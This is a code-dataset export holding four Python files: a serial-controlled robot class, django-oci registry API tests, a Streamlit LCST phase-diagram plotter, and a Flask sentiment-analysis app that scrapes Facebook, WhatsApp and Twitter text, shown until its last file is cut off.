hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
887ad1b6a09fd7cd401ad5b4a47a80e80503fdb2
| 3,177
|
py
|
Python
|
software/robotClass.py
|
technovus-sfu/swarmbots
|
6a50193a78056c0359c426b097b96e1c37678a55
|
[
"MIT"
] | null | null | null |
software/robotClass.py
|
technovus-sfu/swarmbots
|
6a50193a78056c0359c426b097b96e1c37678a55
|
[
"MIT"
] | 3
|
2018-02-05T23:21:02.000Z
|
2018-05-03T02:58:50.000Z
|
software/robotClass.py
|
technovus-sfu/swarmbots
|
6a50193a78056c0359c426b097b96e1c37678a55
|
[
"MIT"
] | null | null | null |
import serial
import string
import math
from itertools import chain
class robot:
address = "/dev/cu.HC-05-DevB"
speed = 0;
current_position = [0,0,0]
target_position = [0, 0]
distance = 0;
angle_diff = 0;
compliment = 0;
colorLower = [0,0,0]
colorUpper = [0,0,0]
ID = 0
# def __init__ (self):
# pass
#
def __init__ (self, colorL, colorU, ID = None):
self.colorLower = colorL
self.colorUpper = colorU
self.ID = ID
#
# set address and target
def initialize_port(self, address, target):
self.address = address
self.target_position = target
self.port = serial.Serial(address, 9600)
# method to move the robot
def move(self):
self.calc_dist_angle()
# print ("angle ", self.angle_diff, "distance", self.distance, "compliment", self.compliment)
if 20 <= abs(self.compliment) <= 160 and self.distance > 100:
print ("orientating")
self.orient()
elif self.distance > 170:
# print ("moving")
if 160 <= abs(self.angle_diff) <= 200:
# print ("should go forward")
self.forward()
elif math.floor(abs(self.angle_diff)) in range (0,20)+range(340,360):
# print ("should go backward")
self.backward()
#
else:
self.stop();
# method to find the required orientation
def orient(self):
if abs(self.speed) > 0.5:
self.speed = 0
#
left_turn_conditions = chain(range(-90,0),range(90,180),range(-270,-180),range(270,360))
right_turn_conditions = chain(range(0,90),range(-180,-90),range(180, 270),range(-360,-270))
if math.floor(self.angle_diff) in left_turn_conditions and (self.speed > -0.5):
print ("left")
self.port.write(bytearray("a","utf-8"))
self.speed = self.speed - 0.5
elif math.floor(self.angle_diff) in right_turn_conditions and (self.speed < 0.5):
print ("right")
self.port.write(bytearray("d","utf-8"))
self.speed = self.speed + 0.5
# method to move the robot forward
def forward(self):
if abs(self.speed) == 0.5:
self.speed = 0
#
ratio = int(math.ceil((self.distance*8)/1000))
if self.speed < 2:
# for i in range(0,ratio):
print ("forward ", ratio, self.speed)
self.port.write(bytearray("w","utf-8"))
self.speed = self.speed+1;
# method to move the robot backward
def backward(self):
ratio = int(math.ceil((self.distance*8)/1000))
if self.speed > -2:
print ("backward", ratio, self.speed)
# for i in range(0,ratio):
self.port.write(bytearray("s","utf-8"))
self.speed = self.speed-1;
# method to stop the robot
def stop(self):
self.port.write(bytearray("q","utf-8"))
self.speed = 0
# method to calculate the distance between robot and target and orientation difference
def calc_dist_angle(self):
x_delta = self.target_position[0] - self.current_position[0]
y_delta = self.target_position[1] - self.current_position[1]
self.distance = math.hypot(x_delta, y_delta)
required_orientation = math.atan2(y_delta, x_delta) * 180/math.pi
current_orientation = self.current_position[2]
self.angle_diff = (required_orientation - current_orientation)
#calculates the compliment of angle [0, 180] in each quadrant
self.compliment = abs(self.angle_diff) - math.floor( abs(self.angle_diff)/180 )*180
| 27.868421
| 95
| 0.678942
| 486
| 3,177
| 4.339506
| 0.22428
| 0.081081
| 0.042674
| 0.031294
| 0.241821
| 0.217165
| 0.154576
| 0.154576
| 0.100522
| 0.071124
| 0
| 0.054455
| 0.173434
| 3,177
| 113
| 96
| 28.115044
| 0.748667
| 0.17847
| 0
| 0.068493
| 0
| 0
| 0.032458
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109589
| false
| 0
| 0.054795
| 0
| 0.315068
| 0.068493
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
887d7ad21774f9d78fa33b58dec3b6e2af7b8b30
| 13,930
|
py
|
Python
|
tests/test_api.py
|
vsoch/django-oci
|
e60b2d0501ddd45f6ca3596b126180bebb2e6903
|
[
"Apache-2.0"
] | 5
|
2020-03-24T23:45:28.000Z
|
2021-11-26T03:31:05.000Z
|
tests/test_api.py
|
vsoch/django-oci
|
e60b2d0501ddd45f6ca3596b126180bebb2e6903
|
[
"Apache-2.0"
] | 14
|
2020-04-02T17:13:28.000Z
|
2020-12-29T12:36:38.000Z
|
tests/test_api.py
|
vsoch/django-oci
|
e60b2d0501ddd45f6ca3596b126180bebb2e6903
|
[
"Apache-2.0"
] | null | null | null |
"""
test_django-oci api
-------------------
Tests for `django-oci` api.
"""
from django.urls import reverse
from django.contrib.auth.models import User
from django_oci import settings
from rest_framework import status
from rest_framework.test import APITestCase
from django.test.utils import override_settings
from time import sleep
from unittest import skipIf
import subprocess
import requests
import hashlib
import base64
import json
import os
import re
here = os.path.abspath(os.path.dirname(__file__))
# Boolean from environment that determines authentication required variable
auth_regex = re.compile('(\w+)[:=] ?"?([^"]+)"?')
# Important: user needs to be created globally to be seen
user, _ = User.objects.get_or_create(username="dinosaur")
token = str(user.auth_token)
def calculate_digest(blob):
"""Given a blob (the body of a response) calculate the sha256 digest"""
hasher = hashlib.sha256()
hasher.update(blob)
return hasher.hexdigest()
def get_auth_header(username, password):
"""django oci requires the user token as the password to generate a longer
auth token that will expire after some number of seconds
"""
auth_str = "%s:%s" % (username, password)
auth_header = base64.b64encode(auth_str.encode("utf-8"))
return {"Authorization": "Basic %s" % auth_header.decode("utf-8")}
def get_authentication_headers(response):
"""Given a requests.Response, assert that it has status code 401 and
provides the Www-Authenticate header that can be parsed for the request
"""
assert response.status_code == 401
assert "Www-Authenticate" in response.headers
matches = dict(auth_regex.findall(response.headers["Www-Authenticate"]))
for key in ["scope", "realm", "service"]:
assert key in matches
# Prepare authentication headers and get token
headers = get_auth_header(user.username, token)
url = "%s?service=%s&scope=%s" % (
matches["realm"],
matches["service"],
matches["scope"],
)
# With proper headers should be 200
auth_response = requests.get(url, headers=headers)
assert auth_response.status_code == 200
body = auth_response.json()
# Make sure we have the expected fields
for key in ["token", "expires_in", "issued_at"]:
assert key in body
# Formulate new auth header
return {"Authorization": "Bearer %s" % body["token"]}
def read_in_chunks(image, chunk_size=1024):
"""Helper function to read file in chunks, with default size 1k."""
while True:
data = image.read(chunk_size)
if not data:
break
yield data
def get_manifest(config_digest, layer_digest):
"""A dummy image manifest with a config and single image layer"""
return json.dumps(
{
"schemaVersion": 2,
"config": {
"mediaType": "application/vnd.oci.image.config.v1+json",
"size": 7023,
"digest": config_digest,
},
"layers": [
{
"mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
"size": 32654,
"digest": layer_digest,
}
],
"annotations": {"com.example.key1": "peas", "com.example.key2": "carrots"},
}
)
class APIBaseTests(APITestCase):
def setUp(self):
self.process = subprocess.Popen(["python", "manage.py", "runserver"])
sleep(2)
def tearDown(self):
os.kill(self.process.pid, 9)
def test_api_version_check(self):
"""
GET of /v2 should return a 200 response.
"""
url = reverse("django_oci:api_version_check")
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
class APIPushTests(APITestCase):
def push(
self,
digest,
data,
content_type="application/octet-stream",
test_response=True,
extra_headers={},
):
url = "http://127.0.0.1:8000%s?digest=%s" % (
reverse("django_oci:blob_upload", kwargs={"name": self.repository}),
digest,
)
print("Single Monolithic POST: %s" % url)
headers = {
"Content-Length": str(len(data)),
"Content-Type": content_type,
}
headers.update(extra_headers)
response = requests.post(url, data=data, headers=headers)
if test_response:
self.assertTrue(
response.status_code
in [status.HTTP_202_ACCEPTED, status.HTTP_201_CREATED]
)
return response
def test_push_post_then_put(self):
"""
POST /v2/<name>/blobs/uploads/
PUT /v2/<name>/blobs/uploads/
"""
url = "http://127.0.0.1:8000%s" % (
reverse("django_oci:blob_upload", kwargs={"name": self.repository})
)
print("POST to request session: %s" % url)
headers = {"Content-Type": "application/octet-stream"}
response = requests.post(url, headers=headers)
auth_headers = get_authentication_headers(response)
headers.update(auth_headers)
response = requests.post(url, headers=headers)
# Location must be in response header
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertTrue("Location" in response.headers)
blob_url = "http://127.0.0.1:8000%s?digest=%s" % (
response.headers["Location"],
self.digest,
)
# PUT to upload blob url
headers = {
"Content-Length": str(len(self.data)),
"Content-Type": "application/octet-stream",
}
headers.update(auth_headers)
print("PUT to upload: %s" % blob_url)
response = requests.put(blob_url, data=self.data, headers=headers)
# This should allow HTTP_202_ACCEPTED too
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue("Location" in response.headers)
download_url = add_url_prefix(response.headers["Location"])
response = requests.get(download_url, headers=auth_headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Test upload request from another repository
non_standard_name = "conformance-aedf05b6-6996-4dae-ad18-70a4db9e9061"
url = "http://127.0.0.1:8000%s" % (
reverse("django_oci:blob_upload", kwargs={"name": non_standard_name})
)
url = "%s?mount=%s&from=%s" % (url, self.digest, self.repository)
print("POST to request mount from another repository: %s" % url)
headers = {"Content-Type": "application/octet-stream"}
response = requests.post(url, headers=headers)
auth_headers = get_authentication_headers(response)
headers.update(auth_headers)
response = requests.post(url, headers=headers)
assert "Location" in response.headers
assert non_standard_name in response.headers["Location"]
download_url = add_url_prefix(response.headers["Location"])
response = requests.get(download_url, headers=auth_headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_push_chunked(self):
"""
POST /v2/<name>/blobs/uploads/
PATCH <location>
PUT /v2/<name>/blobs/uploads/
"""
url = "http://127.0.0.1:8000%s" % (
reverse("django_oci:blob_upload", kwargs={"name": self.repository})
)
print("POST to request chunked session: %s" % url)
headers = {"Content-Type": "application/octet-stream", "Content-Length": "0"}
response = requests.post(url, headers=headers)
auth_headers = get_authentication_headers(response)
headers.update(auth_headers)
response = requests.post(url, headers=headers)
# Location must be in response header
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertTrue("Location" in response.headers)
session_url = "http://127.0.0.1:8000%s" % response.headers["Location"]
# Read the file in chunks, for each do a patch
start = 0
with open(self.image, "rb") as fd:
for chunk in read_in_chunks(fd):
if not chunk:
break
end = start + len(chunk) - 1
content_range = "%s-%s" % (start, end)
headers = {
"Content-Range": content_range,
"Content-Length": str(len(chunk)),
"Content-Type": "application/octet-stream",
}
headers.update(auth_headers)
start = end + 1
print("PATCH to upload content range: %s" % content_range)
response = requests.patch(session_url, data=chunk, headers=headers)
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertTrue("Location" in response.headers)
# Finally, issue a PUT request to close blob
session_url = "%s?digest=%s" % (session_url, self.digest)
response = requests.put(session_url, headers=auth_headers)
# Location must be in response header
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue("Location" in response.headers)
def test_push_view_delete_manifest(self):
"""
PUT /v2/<name>/manifests/<reference>
DELETE /v2/<name>/manifests/<reference>
"""
url = "http://127.0.0.1:8000%s" % (
reverse(
"django_oci:image_manifest",
kwargs={"name": self.repository, "tag": "latest"},
)
)
print("PUT to create image manifest: %s" % url)
# Calculate digest for config (yes, we haven't uploaded the blob, it's ok)
with open(self.config, "r") as fd:
content = fd.read()
config_digest = calculate_digest(content.encode("utf-8"))
# Prepare the manifest (already a text string)
manifest = get_manifest(config_digest, self.digest)
manifest_reference = "sha256:%s" % calculate_digest(manifest.encode("utf-8"))
headers = {
"Content-Type": "application/vnd.oci.image.manifest.v1+json",
"Content-Length": str(len(manifest)),
}
response = requests.put(url, headers=headers, data=manifest)
auth_headers = get_authentication_headers(response)
headers.update(auth_headers)
response = requests.put(url, headers=headers, data=manifest)
# Location must be in response header
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue("Location" in response.headers)
# test manifest download
response = requests.get(url, headers=auth_headers).json()
for key in ["schemaVersion", "config", "layers", "annotations"]:
assert key in response
# Retrieve newly created tag
tags_url = "http://127.0.0.1:8000%s" % (
reverse("django_oci:image_tags", kwargs={"name": self.repository})
)
print("GET to list tags: %s" % tags_url)
tags = requests.get(tags_url, headers=auth_headers)
self.assertEqual(tags.status_code, status.HTTP_200_OK)
tags = tags.json()
for key in ["name", "tags"]:
assert key in tags
# First delete tag (we are allowed to have an untagged manifest)
response = requests.delete(url, headers=auth_headers)
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
# Finally, delete the manifest
url = "http://127.0.0.1:8000%s" % (
reverse(
"django_oci:image_manifest",
kwargs={"name": self.repository, "reference": manifest_reference},
)
)
response = requests.delete(url, headers=auth_headers)
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
def test_push_single_monolithic_post(self):
"""
POST /v2/<name>/blobs/uploads/
"""
# Push the image blob, should return 401 without authentication
response = self.push(digest=self.digest, data=self.data, test_response=False)
headers = get_authentication_headers(response)
response = self.push(
digest=self.digest,
data=self.data,
test_response=False,
extra_headers=headers,
)
assert response.status_code == 201
assert "Location" in response.headers
download_url = add_url_prefix(response.headers["Location"])
response = requests.get(download_url, headers=headers if headers else None)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Upload an image manifest
with open(self.config, "r") as fd:
content = fd.read().encode("utf-8")
config_digest = calculate_digest(content)
self.push(digest=config_digest, data=content, extra_headers=headers)
def setUp(self):
self.repository = "vanessa/container"
self.image = os.path.abspath(
os.path.join(here, "..", "examples", "singularity", "busybox_latest.sif")
)
self.config = os.path.abspath(
os.path.join(here, "..", "examples", "singularity", "config.json")
)
# Read binary data and calculate sha256 digest
with open(self.image, "rb") as fd:
self.data = fd.read()
self._digest = calculate_digest(self.data)
self.digest = "sha256:%s" % self._digest
def add_url_prefix(download_url):
if not download_url.startswith("http"):
download_url = "http://127.0.0.1:8000%s" % download_url
return download_url
| 37.245989
| 87
| 0.618808
| 1,646
| 13,930
| 5.106318
| 0.179222
| 0.026175
| 0.034265
| 0.030934
| 0.445687
| 0.404997
| 0.372873
| 0.3674
| 0.353599
| 0.310767
| 0
| 0.024093
| 0.264034
| 13,930
| 373
| 88
| 37.345845
| 0.795747
| 0.130366
| 0
| 0.280303
| 0
| 0
| 0.158076
| 0.044228
| 0
| 0
| 0
| 0
| 0.117424
| 1
| 0.056818
| false
| 0.007576
| 0.056818
| 0
| 0.143939
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
887d7f78ede177237d678a89bcd14f2af84d31d3
| 1,492
|
py
|
Python
|
LCSTPlotter.py
|
edwinstorres/LCST-Plotter
|
1afbd251cc395461498e902069e90bb14e66b013
|
[
"MIT"
] | null | null | null |
LCSTPlotter.py
|
edwinstorres/LCST-Plotter
|
1afbd251cc395461498e902069e90bb14e66b013
|
[
"MIT"
] | null | null | null |
LCSTPlotter.py
|
edwinstorres/LCST-Plotter
|
1afbd251cc395461498e902069e90bb14e66b013
|
[
"MIT"
] | null | null | null |
#LCST Plotter
#Author: ESTC
import numpy
import streamlit
import matplotlib.pyplot as plt
import pandas
def launch_app():
streamlit.title("LCST Plotter")
global cation, anion, mw_cat, mw_an, datafile
cation = streamlit.text_input("Enter the abbreviation of the cation:")
# mw_cat = streamlit.text_input("Enter the molecular weight of the cation:")
anion = streamlit.text_input("Enter the abbreviationo of the anion:")
# mw_an = streamlit.text_input("Enter the molecular weight of the anion:")
T_start = streamlit.text_input("Enter start temperature in °C")
streamlit.text_input("Enter your initials:")
datafile = streamlit.file_uploader("Upload the LCST file:",type="xlsx")
def load_data(datafile):
global T,x1a,x1b,x1
data = pandas.read_excel(datafile)
T = data['T']-273.15
x1a = data["x'1"]
x1b = data['x"1']
# x1 =
streamlit.dataframe(data)
def make_plot(x1a,x1b,T,cation,anion):
fig,ax = plt.subplots()
ax.set_title("Predicted Phase Diagram of Aqueous ["+cation+"]["+anion+"]")
ax.scatter(x1a,T,marker=".",c="blue")
ax.scatter(x1b,T,marker=".",c="blue")
ax.set_xlabel("Water Mole Fraction")
ax.set_xlim([0,1.05])
ax.set_ylabel("Temperature (°C)")
ax.set_ylim([0,150])
plt.savefig(cation+"_"+anion+".png")
streamlit.pyplot(fig)
launch_app()
if datafile is not None:
load_data(datafile)
make_plot(x1a,x1b,T,cation,anion)
| 32.434783
| 81
| 0.661528
| 216
| 1,492
| 4.462963
| 0.398148
| 0.068465
| 0.112033
| 0.143154
| 0.232365
| 0.149378
| 0.149378
| 0.095436
| 0.095436
| 0
| 0
| 0.022556
| 0.197721
| 1,492
| 45
| 82
| 33.155556
| 0.781119
| 0.118633
| 0
| 0
| 0
| 0
| 0.202532
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088235
| false
| 0
| 0.117647
| 0
| 0.205882
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
887dda35242cbfb0d65a1b78e9d2c415c3d774ec
| 13,039
|
py
|
Python
|
hello.py
|
zarqabiqbal/RTDA-Real-Time-Data-Analysis-ML-Project-
|
0659191afa6a8802647f46d0dc4f85f2044639e5
|
[
"Apache-2.0"
] | null | null | null |
hello.py
|
zarqabiqbal/RTDA-Real-Time-Data-Analysis-ML-Project-
|
0659191afa6a8802647f46d0dc4f85f2044639e5
|
[
"Apache-2.0"
] | null | null | null |
hello.py
|
zarqabiqbal/RTDA-Real-Time-Data-Analysis-ML-Project-
|
0659191afa6a8802647f46d0dc4f85f2044639e5
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
from flask import Flask, render_template, app, url_for,request
import tweepy # To consume Twitter's API
import pandas as pd # To handle data
import numpy as np # For number computing
from textblob import TextBlob
import re
import pandas as pa
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from nltk.corpus import stopwords
import time
import itertools
app=Flask(__name__)
@app.route('/')
@app.route('/index')
def index():
return render_template('index2.html')
@app.route('/index2')
def index2():
return render_template('index.html')
@app.route('/layout')
def layout():
return render_template('layout.html')
@app.route('/home')
def home():
return render_template('home.html')
@app.route('/Sentiment_Search', methods=['POST'])
def Sentiment_Search():
search=request.form['search_Text']
sid = SentimentIntensityAnalyzer()
ss = sid.polarity_scores(search)
neg = float(ss['neg']*100)
neu = float(ss['neu']*100)
pos = float(ss['pos']*100)
compound =float(ss['compound']*100)
ok=1
return render_template("home.html",okk=ok,negg=neg,neuu=neu,poss=pos,comm=compound,srch=search)
@app.route('/facebook', methods=['POST'])
def facebook():
try:
driver = webdriver.Firefox()
driver.get("https://www.facebook.com")
wait = WebDriverWait(driver, 600)
u_id = wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="_1k67 _cy7"]')))
u_id.click()
x=0
while x<1000:
driver.execute_script("window.scrollBy(0,2000)")
time.sleep(1)
x=x+50
status=driver.find_elements_by_xpath('//div[@class="_1dwg _1w_m _q7o"]')
stdetails=[]
for i in status:
stdetails.append(i.text)
status_details=[]
for i in stdetails:
status_details.append(i.split())
tokenized=list(itertools.chain.from_iterable(status_details))
#remove punctuation from list
tokenized=[i for i in tokenized if i.lower() not in stopwords.words('english')]
sid = SentimentIntensityAnalyzer()
neg=0
neu=0
pos=0
compound=0
for sentence in tokenized:
ss = sid.polarity_scores(sentence)
neg = neg+ float(ss['neg'])
neu = neu +float(ss['neu'])
pos = pos + float(ss['pos'])
compound = compound+float(ss['compound'])
total=neg+neu+pos+compound
negative=(neg/total)*100
neutral=(neu/total)*100
positive=(pos/total)*100
compound=((compound/total)*100)
if negative > neutral and negative > positive and negative > compound:
greatest=negative
great="Highest Polarity is of Negative"
if neutral > positive and neutral > negative and neutral > compound:
greatest=neutral
great="Highest Polarity is of Neutral"
if positive > neutral and positive > negative and positive > compound:
greatest=positive
great="Highest Polarity is of Positive"
if compound > neutral and compound > negative and compound > positive:
greatest=positive
great="Highest Polarity is of Compound"
greatest= float("{0:.2f}".format(greatest))
driver.close()
return render_template('facebook_output.html',negg=negative,poss=positive,neuu=neutral,compp=compound,great_per=greatest,str_var=great)
except:
err=1
titleshow="Some Error !! try again ......."
return render_template("whatsapp.html",error=titleshow,condition=err)
@app.route('/whatsappAnalysis', methods=['POST'])
def whatsappAnalysis():
target=request.form['conversation_id']
try:
driver = webdriver.Firefox()
driver.get("https://web.whatsapp.com/")
wait = WebDriverWait(driver, 600)
x_arg = '//span[contains(@title, '+ '"' +target + '"'+ ')]'
person_title = wait.until(EC.presence_of_element_located((By.XPATH, x_arg)))
person_title.click()
x=-50
chat=[]
while x > -2000:
element=driver.find_element_by_xpath("//div[@class='_9tCEa']")
driver.execute_script("arguments[0].scrollIntoView(500);",element);
x=x-100
time.sleep(1)
textget=driver.find_elements_by_class_name("selectable-text.invisible-space.copyable-text")
print("Number of tweets extracted: {}.\n".format(len(textget)))
for Text in textget:
chat.append(Text.text)
menu=driver.find_elements_by_class_name("rAUz7")
menu[2].click()
list=driver.find_elements_by_class_name("_10anr.vidHz._28zBA")
list[5].click()
a=len(chat)
b=int(a/2)
data=chat[b:a]
sid = SentimentIntensityAnalyzer()
neg=0
neu=0
pos=0
compound=0
for sentence in data:
ss = sid.polarity_scores(sentence)
neg = neg+ float(ss['neg'])
neu = neu +float(ss['neu'])
pos = pos + float(ss['pos'])
compound = compound+float(ss['compound'])
total=neg+neu+pos+compound
negative=(neg/total)*100
neutral=(neu/total)*100
positive=(pos/total)*100
compound=((compound/total)*100)
if negative > neutral and negative > positive and negative > compound:
greatest=negative
great="Highest Polarity is of Negative"
if neutral > positive and neutral > negative and neutral > compound:
greatest=neutral
great="Highest Polarity is of Neutral"
if positive > neutral and positive > negative and positive > compound:
greatest=positive
great="Highest Polarity is of Positive"
if compound > neutral and compound > negative and compound > positive:
greatest=positive
great="Highest Polarity is of Compound"
greatest= float("{0:.2f}".format(greatest))
driver.close()
return render_template('facebook_output.html',negg=negative,poss=positive,neuu=neutral,compp=compound,great_per=greatest,str_var=great)
print("ok")
except:
err=1
titleshow="Some Error !! try again ......."
return render_template("facebook_output.html",error=titleshow,condition=err)
@app.route('/datacoming_twitter', methods=['POST'])
def data_twitter():
try:
CONSUMER_KEY = '--'
CONSUMER_SECRET = '--'
ACCESS_TOKEN = '--'
ACCESS_SECRET = '--'
def twitter_setup():
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
api = tweepy.API(auth)
return api
# We create an extractor object:
extractor = twitter_setup()
SearchName=request.form['tw_username']
tweets = extractor.user_timeline(screen_name="@"+SearchName, count=200)
length_tweets=str(len(tweets))
data = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=['Tweets'])
data['len'] = np.array([len(tweet.text) for tweet in tweets])
data['ID'] = np.array([tweet.id for tweet in tweets])
data['Date'] = np.array([tweet.created_at for tweet in tweets])
data['Source'] = np.array([tweet.source for tweet in tweets])
data['Likes'] = np.array([tweet.favorite_count for tweet in tweets])
data['RTs'] = np.array([tweet.retweet_count for tweet in tweets])
mean = np.mean(data['len'])
fav_max = np.max(data['Likes'])
rt_max = np.max(data['RTs'])
fav = data[data.Likes == fav_max].index[0]
rt = data[data.RTs == rt_max].index[0]
liked_tweet=data['Tweets'][fav]
retweets=data['Tweets'][rt]
sources = []
for source in data['Source']:
if source not in sources:
sources.append(source)
def clean_tweet(tweet):
"""
Utility function to clean the text in a tweet by removing
links and special characters using regex.
"""
return ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split())
def analize_sentiment(tweet):
"""
Utility function to classify the polarity of a tweet
using textblob
"""
analysis = TextBlob(clean_tweet(tweet))
if analysis.sentiment.polarity > 0:
return 1
elif analysis.sentiment.polarity == 0:
return 0
else:
return -1
data['SA'] = np.array([ analize_sentiment(tweet) for tweet in data['Tweets'] ])
